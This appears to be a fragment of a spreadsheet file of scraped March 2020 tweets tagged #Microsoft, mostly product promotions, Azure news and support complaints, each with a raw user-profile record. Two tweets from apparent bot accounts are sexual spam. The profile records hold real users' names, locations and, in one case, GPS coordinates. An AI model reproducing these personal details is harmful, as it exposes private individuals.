    <t>Who wants to see my private collection of 
 #microsoft #washingtondc https://t.co/5MU9fNQ5cs</t>
  </si>
  <si>
    <t>{'id': 1235310658746568704, 'id_str': '1235310658746568704', 'name': 'Crystal Perkins', 'screen_name': 'moherhacip', 'location': 'South Bend, USA', 'description': 'If I know what love is, it is because of you.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Wed Mar 04 21:06:31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'http://pbs.twimg.com/profile_images/1235312800739856385/Srj4cREG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235312800739856385/Srj4cREG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235310658746568704/1583356530',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</si>
  <si>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11:11:27 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft bad google and youtube and bad chrome engine and bad feedback and bad chrome and edge and ad and screenshot and bad response and browsing and speed so much slow and have issues and weak performance</t>
  </si>
  <si>
    <t>Thu Mar 05 11:11:06 +0000 2020</t>
  </si>
  <si>
    <t>IR35 tribunal sees Nationwide project manager lose 70,000 tax bill appeal to HMRC https://t.co/WV5VBBHA2j via @Hybrid_Circle #HPE #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 11:10:42 +0000 2020</t>
  </si>
  <si>
    <t>We've answered your top questions regarding the business IT - from outsourcing IT to an MSP to how to prevent phishing attempts, click below to discover the answers.
https://t.co/AE8wHaHKjn
#MSP #managedservices #IT #dataprivacy #datasecurity #Microsoft  #Windows7 #ITSecurity https://t.co/p2NQVa7hmU</t>
  </si>
  <si>
    <t>{'id': 367665058, 'id_str': '367665058', 'name': 'Calligo Limited', 'screen_name': 'CalligoCloud', 'location': '', 'description': 'Global data optimization and privacy specialists.\n\nWe provide #Cloud &amp; #ITManagedServices, #DataPrivacy &amp; #AI consultancy.\n\nDiscover more here https://t.co/4YXm0LDTHN', 'url': 'https://t.co/4YXm0LDTHN', 'entities': {'url': {'urls': [{'url': 'https://t.co/4YXm0LDTHN', 'expanded_url': 'http://www.calligo.cloud', 'display_url': 'calligo.cloud', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/4YXm0LDTHN', 'expanded_url': 'http://www.calligo.cloud', 'display_url': 'calligo.cloud', 'indices': [143, 166]}]}}, 'protected': False, 'followers_count': 1389, 'friends_count': 1129, 'listed_count': 98, 'created_at': 'Sun Sep 04 10:37:22 +0000 2011', 'favourites_count': 596, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3240,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'http://pbs.twimg.com/profile_images/991245111613902848/NNO0zjFs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991245111613902848/NNO0zjFs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/367665058/1543922473', 'profile_link_color': '00BAEA',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</si>
  <si>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11:10:19 +0000 2020</t>
  </si>
  <si>
    <t>We are now offering our customers a five-day intensive course to become #Microsoft #AzureAdministrators with possible savings of over 60%. Find out more https://t.co/vlSeNtPAt1
#Cloud #Azure</t>
  </si>
  <si>
    <t>Thu Mar 05 11:10:16 +0000 2020</t>
  </si>
  <si>
    <t>.@EYnews in collaboration with technology giant @Microsoft and @Consensys have launched their open-source Baseline #protocol aimed at addressing privacy issues to encourage enterprise adoption of @ethereum's public #blockchain. #microsoft #ethereum #ey
https://t.co/hRbtajZuPV</t>
  </si>
  <si>
    <t>{'id': 1094811551305936896, 'id_str': '1094811551305936896', 'name': 'Blockchain.News', 'screen_name': 'BlockchainNewsM', 'location': 'http://bitcoin.news', 'description': 'Top Blockchain News Media | Latest analyses, leading voices and opportunities in blockchain | Follow and subscribe to us today: https://t.co/A9HpDnek6l', 'url': 'https://t.co/MP7SXTkVl1', 'entities': {'url': {'urls': [{'url': 'https://t.co/MP7SXTkVl1', 'expanded_url': 'https://blockchain.news', 'display_url': 'blockchain.news', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/A9HpDnek6l', 'expanded_url': 'http://bit.ly/2GMbeEx', 'display_url': 'bit.ly/2GMbeEx', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 1641, 'friends_count': 400, 'listed_count': 24, 'created_at': 'Mon Feb 11 04:13:09 +0000 2019', 'favourites_count': 1247, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2120,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'http://pbs.twimg.com/profile_images/1152158143738028032/Xm3FEm5Q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152158143738028032/Xm3FEm5Q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1094811551305936896/1563530883',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</si>
  <si>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11:06:52 +0000 2020</t>
  </si>
  <si>
    <t>Strong showing of #WomenIntech at today's #HPE and #Microsoft Roadshow in Lisbon. First three speakers are all amazing @womenincloud experts. Thanks @b_hallmans, Maria and Alexandra for your insightfull presentations! #HPE_Alliances @msPartner @MicrosoftES @HPE_ES @mamajoamato https://t.co/q6RUN8RxRX</t>
  </si>
  <si>
    <t>Thu Mar 05 11:06:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft bad google and youtube and bad chrome engine</t>
  </si>
  <si>
    <t>Thu Mar 05 11:06:06 +0000 2020</t>
  </si>
  <si>
    <t>Great to be in the kingdom today #kerry @accsirl annual conference, come learn how we can work with your school to develop a structured #DigitalSkillsStrategy  #Certification #Microsoft #STEM #MOS @CertMatters @MS_eduIRL https://t.co/gTAttGhpPK</t>
  </si>
  <si>
    <t>{'id': 315812415, 'id_str': '315812415', 'name': 'Billy Breen', 'screen_name': 'BillyBreen1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 255, 'friends_count': 201, 'listed_count': 7, 'created_at': 'Sun Jun 12 13:52:39 +0000 2011', 'favourites_count': 589, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 692,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'http://pbs.twimg.com/profile_images/1707830032/image_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1707830032/image_normal.jpg',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</si>
  <si>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11:04:55 +0000 2020</t>
  </si>
  <si>
    <t>I'm really grateful to Microsoft for the way is empowering us employees to take the best decisions for our and public safety. We continue to be customer-driven, but health and safety first. And this doesn't mean just our safety, but also customer's safety #proud #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 11:04:47 +0000 2020</t>
  </si>
  <si>
    <t>The EY Vision Is To Leverage The Public @ethereum Network Without Putting Any Enterprise Data At Risk 
https://t.co/6czTuOpwWk
#blockchain #ey #crypto #cryptocurrency #big4 #microsoft #dlt #baselineprotocol</t>
  </si>
  <si>
    <t>{'id': 1154007745449943040, 'id_str': '1154007745449943040', 'name': 'Coinspace News', 'screen_name': 'coinspace_news', 'location': '', 'description': 'Welcome to Coinspace News! ðŸ™Œ We report recent events, opinions and technological breakthroughs in the crypto industry.', 'url': 'https://t.co/ETnZHxrVQA', 'entities': {'url': {'urls': [{'url': 'https://t.co/ETnZHxrVQA', 'expanded_url': 'https://coinspace.com/news', 'display_url': 'coinspace.com/news', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1285, 'friends_count': 1084, 'listed_count': 2, 'created_at': 'Wed Jul 24 12:37:41 +0000 2019', 'favourites_count': 502, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 807, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1154009682270400512/9XFYi94W_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154009682270400512/9XFYi94W_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1154007745449943040/1564043576',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</si>
  <si>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11:02:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts new #coronavirus plan: Seattle-area employees to work from home for next 3 weeks  GeekWire https://t.co/D9nQqta45m</t>
  </si>
  <si>
    <t>Thu Mar 05 11:02:00 +0000 2020</t>
  </si>
  <si>
    <t>Alexandra Mira da Silva talks about #HPE solutions for #Microsoft #AzureStack portfolio, the broadest set of integrated &amp;amp; certified solutions from #AzurestackHub to #AzurestackHCI at today's #Hybridcloud Summit in Lisbon https://t.co/6iRF66sXAG #WomenIntech #HPEAlliances https://t.co/ZaB97WQyVx</t>
  </si>
  <si>
    <t>Thu Mar 05 11:01:13 +0000 2020</t>
  </si>
  <si>
    <t>[Course by Guy Hummel] This Learning Path is designed to help you and your team prepare for #Microsoft's #DP200 Implementing an #AzureDataSolution exam. Check it out now! #Azure
https://t.co/8nUKuhyQzN https://t.co/Moswu39bYE</t>
  </si>
  <si>
    <t>{'id': 770309118, 'id_str': '770309118', 'name': 'Cloud Academy', 'screen_name': 'cloudacademy', 'location': 'San Francisco, CA', 'description': 'Cloud Academy is the enterprise-ready training platform for the multi-cloud.', 'url': 'https://t.co/Mp6J1eznfN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mp6J1eznfN', 'expanded_url': 'https://cloudacademy.com', 'display_url': 'cloudacademy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15693, 'friends_count': 792, 'listed_count': 677, 'created_at': 'Mon Aug 20 22:06:54 +0000 2012', 'favourites_count': 8416, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29109,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'http://pbs.twimg.com/profile_images/1233402309440307200/KPw9dEnV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233402309440307200/KPw9dEnV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/770309118/1537215415', 'profile_link_color': '1874BA',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</si>
  <si>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11:00:22 +0000 2020</t>
  </si>
  <si>
    <t>Nothing is more important than watching your clients grow! That is one of our priorities here at CloudCockpit - we help you nurture your #Microsoft Resellers by allowing you to control and manage your subscriptions. 
More info: https://t.co/PlTLNqOE8i
#Microsoft365 #Reseller https://t.co/mbhujiWaQA</t>
  </si>
  <si>
    <t>{'id': 845082774692352000, 'id_str': '845082774692352000', 'name': 'CloudCockpit', 'screen_name': 'CloudCockpit', 'location': 'Portugal', 'description': 'Managing and monitoring the cloud has never been so fast and effective. \n\nIntegrated administration web platform that optimizes and streamlines CSPs operations.', 'url': 'https://t.co/m2orPUHUm6', 'entities': {'url': {'urls': [{'url': 'https://t.co/m2orPUHUm6', 'expanded_url': 'http://cloudcockpit.works', 'display_url': 'cloudcockpit.works', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 101, 'friends_count': 400, 'listed_count': 0, 'created_at': 'Fri Mar 24 01:20:09 +0000 2017', 'favourites_count': 151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 156,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'http://pbs.twimg.com/profile_images/845307329717383177/9r9au7zr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/845307329717383177/9r9au7zr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/845082774692352000/1576770364', 'profile_link_color': '00A4E1',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</si>
  <si>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11:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Bring your modernization vision to life. Come to a free #Microsoft #Azure Training Day: Modernizing Web Applications and Data event in Dubai on 17th March 2020. Sign up: https://t.co/z3qW7OhBip https://t.co/56uxGOKNJi</t>
  </si>
  <si>
    <t>{'id': 1153310112339124224, 'id_str': '1153310112339124224', 'name': 'Microsoft UAE', 'screen_name': 'MicrosoftUAE', 'location': 'United Arab Emirates', 'description': 'Weâ€™re on a mission to empower every person and every organization on the planet to achieve more. Support: @MicrosoftHelps', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 678, 'friends_count': 43, 'listed_count': 2, 'created_at': 'Mon Jul 22 14:25:33 +0000 2019', 'favourites_count': 488, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1299, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1153311479594176513/O9m3ukEB_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153311479594176513/O9m3ukEB_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1153310112339124224/1583253364',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</si>
  <si>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10:59:41 +0000 2020</t>
  </si>
  <si>
    <t>I've sometimes thought of #Microsoft products as malware ... but what would happen if #Google #AI also learned that :)
https://t.co/zvAfbz3FoS</t>
  </si>
  <si>
    <t>{'id': 9485202, 'id_str': '9485202', 'name': 'Martin King', 'screen_name': 'timekord', 'location': 'London', 'description': "Human 'I aim to misbehave'", 'url': 'https://t.co/nZJCOS7IhB', 'entities': {'url': {'urls': [{'url': 'https://t.co/nZJCOS7IhB', 'expanded_url': 'https://beta-martin.blogspot.com/', 'display_url': 'beta-martin.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1825, 'friends_count': 72, 'listed_count': 401, 'created_at': 'Tue Oct 16 20:14:56 +0000 2007', 'favourites_count': 5553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 67219,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'http://pbs.twimg.com/profile_images/459047584359657472/uRK5oHJ1_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/459047584359657472/uRK5oHJ1_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/9485202/1398280793',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</si>
  <si>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10:58:39 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft https://t.co/4knj0iiG8Y and https://t.co/cJvpzZhvQh have issues and weak performance</t>
  </si>
  <si>
    <t>Thu Mar 05 10:57:40 +0000 2020</t>
  </si>
  <si>
    <t>I want you to scream out my name when you cum 
 #nevertrump #microsoft https://t.co/ATy0VhZxSc</t>
  </si>
  <si>
    <t>{'id': 1235501576355225600, 'id_str': '1235501576355225600', 'name': 'Katie Hults', 'screen_name': 'travunbufbyo', 'location': 'Albuquerque, USA', 'description': 'Love comes unseen', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Thu Mar 05 09:45:14 +0000 2020', 'favourites_count': 5,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'http://pbs.twimg.com/profile_images/1235503185118326787/Z4QcQ1LY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235503185118326787/Z4QcQ1LY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235501576355225600/1583401957',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</si>
  <si>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10:57:00 +0000 2020</t>
  </si>
  <si>
    <t>Are you currently using #Office365 and #Azure to boost your customers' digital transformation?
Did you know that by adding onto Dynamics 365, the upsell opportunity could see your current #Microsoft solutions grow by 300% YoY?
Sign up to the webinar: https://t.co/n98ZcdB4qE https://t.co/kwdfNx586D</t>
  </si>
  <si>
    <t>{'id': 2541229568, 'id_str': '2541229568', 'name': 'Ingram Micro Cloud', 'screen_name': 'IMCloud_UK', 'location': 'UK', 'description': 'Transform your business with the intelligent future of #Cloud â˜ï¸Security, Business Apps, Cloud Services, SaaS, PaaS, IaaS and XaaS', 'url': 'https://t.co/Fq2OzbCQKc', 'entities': {'url': {'urls': [{'url': 'https://t.co/Fq2OzbCQKc', 'expanded_url': 'http://www.ingrammicrocloud.com/uk/en', 'display_url': 'ingrammicrocloud.com/uk/en', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3580, 'friends_count': 1210, 'listed_count': 183, 'created_at': 'Mon Jun 02 11:05:48 +0000 2014', 'favourites_count': 1429, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4965,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'http://pbs.twimg.com/profile_images/1206506035848130561/zjgKnsy1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206506035848130561/zjgKnsy1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2541229568/1580726955',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</si>
  <si>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10:56:51 +0000 2020</t>
  </si>
  <si>
    <t>Come and what her stream.
#mixerstreamer #gamergirl #XboxOneX #Microsoft #latenightstreams #ModernWafare
#PS4
https://t.co/QbUZ7N0rRD</t>
  </si>
  <si>
    <t>{'id': 850009388785868800, 'id_str': '850009388785868800', 'name': 'Tharren................', 'screen_name': 'TharrenB93', 'location': 'AZ', 'description': 'keeping life well lived of course.  ðŸ˜œ\n\nSNapchat:  t_bk93', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 166, 'listed_count': 0, 'created_at': 'Thu Apr 06 15:36:45 +0000 2017', 'favourites_count': 979, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 232, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1134627031138758658/7f5iE-1c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134627031138758658/7f5iE-1c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/850009388785868800/1546576390',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</si>
  <si>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10:55:05 +0000 2020</t>
  </si>
  <si>
    <t>#mustRead series of articles about #ZeroTrust
[Article] Monitoring Cloud Security for Zero Trust with Azure Sentinel (3 of 6)
https://t.co/7XGXCHQvjc
#Identity #Microsoft #MFA #ConditionalAccess #CyberSecurity https://t.co/nwHHW9Ynfz</t>
  </si>
  <si>
    <t>Thu Mar 05 10:53:33 +0000 2020</t>
  </si>
  <si>
    <t>@MSFTIssues I try to contact you. This is the THIRD time I m not called back because of Office 365 admin-questions. Three times promises since last week. For the same question, my team can not work if you dont assist us. Please assist me quickly. #microsoft</t>
  </si>
  <si>
    <t>{'id': 24539636, 'id_str': '24539636', 'name': 'Wouter de Heij', 'screen_name': 'deheij', 'location': 'iPhone: 52.270065,5.198683', 'description': 'Food Design &amp; Process Development. Parallel entrepreneur. CEO TOP bv (https://t.co/BVDnms89SC) &amp; F4I ( https://t.co/WO5i0prKd4) &amp; @TBE6Wave &amp; @SoftPaleo', 'url': 'https://t.co/Lr9A9ogwWW', 'entities': {'url': {'urls': [{'url': 'https://t.co/Lr9A9ogwWW', 'expanded_url': 'http://www.wouterdeheij.com', 'display_url': 'wouterdeheij.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/BVDnms89SC', 'expanded_url': 'http://www.top-bv.nl', 'display_url': 'top-bv.nl', 'indices': [70, 93]}, {'url': 'https://t.co/WO5i0prKd4', 'expanded_url': 'https://food4innovations.blog', 'display_url': 'food4innovations.blog', 'indices': [103, 126]}]}}, 'protected': False, 'followers_count': 2775, 'friends_count': 3225, 'listed_count': 95, 'created_at': 'Sun Mar 15 15:46:10 +0000 2009', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26149, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F0F0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/897324111650844674/8Q1QezY3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/897324111650844674/8Q1QezY3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24539636/1354376349', 'profile_link_color': '6699CC', 'profile_sidebar_border_color': '33AAFF', 'profile_sidebar_fill_color': 'CAE7F7', 'profile_text_color': '050505', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 10:52:28 +0000 2020</t>
  </si>
  <si>
    <t>Combining Azure Lighthouse with Sentinels DevOps capabilities https://t.co/kiNSXOXd1g #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 10:52:27 +0000 2020</t>
  </si>
  <si>
    <t>Celebrating International Women's Day - Meet the ITOpsTalk women https://t.co/BQ4vyqVChT #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 10:47:37 +0000 2020</t>
  </si>
  <si>
    <t>Cool! MS announced a cloud based print solution!
#azure #microsoft @brightskiesgmbh #cloud
https://t.co/EcCS6PS5xv</t>
  </si>
  <si>
    <t>{'id': 889179201613557761, 'id_str': '889179201613557761', 'name': 't0m3k', 'screen_name': 'TommyKneetz', 'location': '', 'description': 'Senior Cloud Consultant @brightskiesgmbh | Founder and Organisator of Azure Meetup Schwerin @azureschwerin |  #azure #azuread #m365 #citrix #wvd | MCT', 'url': 'https://t.co/F1OswJHZYS', 'entities': {'url': {'urls': [{'url': 'https://t.co/F1OswJHZYS', 'expanded_url': 'http://www.bskies.io', 'display_url': 'bskies.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 163, 'listed_count': 6, 'created_at': 'Sun Jul 23 17:43:36 +0000 2017', 'favourites_count': 859, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 453, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/949924350890795008/l0FCU0-A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/949924350890795008/l0FCU0-A_normal.jpg',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</si>
  <si>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10:47:33 +0000 2020</t>
  </si>
  <si>
    <t>My Surface book 2 base died spontaneously overnight. Could I get any help with this please? @panos_panay @MicrosoftStore @surface #Surface #Microsoft #TechSupport https://t.co/P8fXxmLHHw</t>
  </si>
  <si>
    <t>{'id': 1072904700960366593, 'id_str': '1072904700960366593', 'name': 'Ponito', 'screen_name': 'Ponito16', 'location': 'Ohio, USA', 'description': "I'm not a youtuber. Check out my youtube channel: https://t.co/osnI91FczJ", 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/osnI91FczJ', 'expanded_url': 'https://www.youtube.com/channel/UCWvgdCgaxRO22IwLv0cwNGw', 'display_url': 'youtube.com/channel/UCWvgdâ€¦', 'indices': [50, 73]}]}}, 'protected': False, 'followers_count': 0, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Wed Dec 12 17:23:09 +0000 2018', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 61, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201670701566050304/1hjnPRrA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201670701566050304/1hjnPRrA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1072904700960366593/1560237184',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</si>
  <si>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10:42:17 +0000 2020</t>
  </si>
  <si>
    <t>If you are #searching for a #green #cloudprovider for #business or #personal use, you can #start here: #Wired #magazine looks at #Amazon, #Google, and #Microsoft. https://t.co/amuTKjbDr4</t>
  </si>
  <si>
    <t>{'id': 44651173, 'id_str': '44651173', 'name': 'Evelyn Laeschke', 'screen_name': 'evelynlaeschke', 'location': 'Berlin', 'description': 'Head of Digital Product Development\nStiftung Humboldt Forum im Berliner Schloss\nTechnical Cave &amp; Wreck Diver | Photography Enthusiast | Opinions are my own!', 'url': 'https://t.co/9oxG2TC4t9', 'entities': {'url': {'urls': [{'url': 'https://t.co/9oxG2TC4t9', 'expanded_url': 'http://humboldtforum.org', 'display_url': 'humboldtforum.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 328, 'friends_count': 160, 'listed_count': 28, 'created_at': 'Thu Jun 04 16:16:04 +0000 2009', 'favourites_count': 414, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1293, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDC98D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1187458402051612673/VIP08zXY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187458402051612673/VIP08zXY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44651173/1571486266', 'profile_link_color': '990000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F4DEB8', 'profile_text_color': '0F3A6C', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 10:41:17 +0000 2020</t>
  </si>
  <si>
    <t>Over 600 #Microsoft #Subdomains Can Be Hijacked. The researchers reported some of the impacted subdomains and Microsoft has taken steps to prevent them from being #hijacked. But its not over yet...
https://t.co/r645QzvvFu</t>
  </si>
  <si>
    <t>{'id': 886575390, 'id_str': '886575390', 'name': 'Derek Mizak', 'screen_name': 'Derekmizak', 'location': 'Dublin City, Ireland', 'description': 'IT Security Auditor, Penetration Tester, #ISO27001, #ISO20000, PhD Researcher at UCD #cybersecurity #AI #machinelearning â€œprofessionally paranoidâ€', 'url': 'https://t.co/LODbfVDO33', 'entities': {'url': {'urls': [{'url': 'https://t.co/LODbfVDO33', 'expanded_url': 'https://dmzit.com', 'display_url': 'dmzit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1815, 'friends_count': 4537, 'listed_count': 61, 'created_at': 'Wed Oct 17 10:54:14 +0000 2012', 'favourites_count': 171, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 912,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'http://pbs.twimg.com/profile_images/811690715407327233/2J5A3KZu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/811690715407327233/2J5A3KZu_normal.jpg',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</si>
  <si>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10:41:12 +0000 2020</t>
  </si>
  <si>
    <t>Three technology trends shaping dynamic networks https://t.co/7XoPQT7TKv via @Hybrid_Circle #Microsoft #Cisco https://t.co/BXdR3DKzxr</t>
  </si>
  <si>
    <t>Thu Mar 05 10:40:50 +0000 2020</t>
  </si>
  <si>
    <t>Sort an #array #InPower Automate in 3 steps #automation https://t.co/hFnxJanuU4 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Thu Mar 05 10:38:53 +0000 2020</t>
  </si>
  <si>
    <t>How to use multiple sessions in Windows 10?
See: https://t.co/ZmwVU9pRT0
#Windows #Windows10 #Windows10Home #WindowsUpdate #windows10pro #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 10:37:02 +0000 2020</t>
  </si>
  <si>
    <t>Through a strong partnership with #HPE, #ZeroDown Software is certified on HPE #AzureStackHub integrated System to deliver Ultra Availability for #AzureStack even during app migration
#HybridCloud #Microsoft #MSpartner @Darmour_MSFT @CrisHybridCloud #Social4UTV #cloud https://t.co/6A8r80xMGT</t>
  </si>
  <si>
    <t>Thu Mar 05 10:32:08 +0000 2020</t>
  </si>
  <si>
    <t>Join the 2020 Power Platform online conference and skill up on Microsoft's power tools.
#PPOC2020 #LessCodeMorePower #event #Microsoft #PowerAutomate https://t.co/KqmDpM3m9s https://t.co/ONEO4UZFba</t>
  </si>
  <si>
    <t>Thu Mar 05 10:32:06 +0000 2020</t>
  </si>
  <si>
    <t>Join the 2020 Power Platform online conference and skill up on Microsoft's power tools.
#PPOC2020 #LessCodeMorePower #event #Microsoft #PowerAutomate https://t.co/EV7p8kKQnw https://t.co/ebbkU0NNUq</t>
  </si>
  <si>
    <t>Thu Mar 05 10:32:04 +0000 2020</t>
  </si>
  <si>
    <t>Join the 2020 Power Platform online conference and skill up on Microsoft's power tools.
#PPOC2020 #LessCodeMorePower #event #Microsoft #PowerAutomate https://t.co/taHF7HfBPh https://t.co/Qqiib27bhR</t>
  </si>
  <si>
    <t>Thu Mar 05 10:31:31 +0000 2020</t>
  </si>
  <si>
    <t>Throw back to our time with @DayoBam7 from @MicrosoftNG
Thank you for being part of the Sparkle journey and thanks to Microsoft 4afrika for making this #sparklingmoment happen!
#teamwork #collaboration #blacksatmicrosoft #sparkle #Microsoft #freedomiscoming #ThrowbackThursday https://t.co/OiygunPLYL</t>
  </si>
  <si>
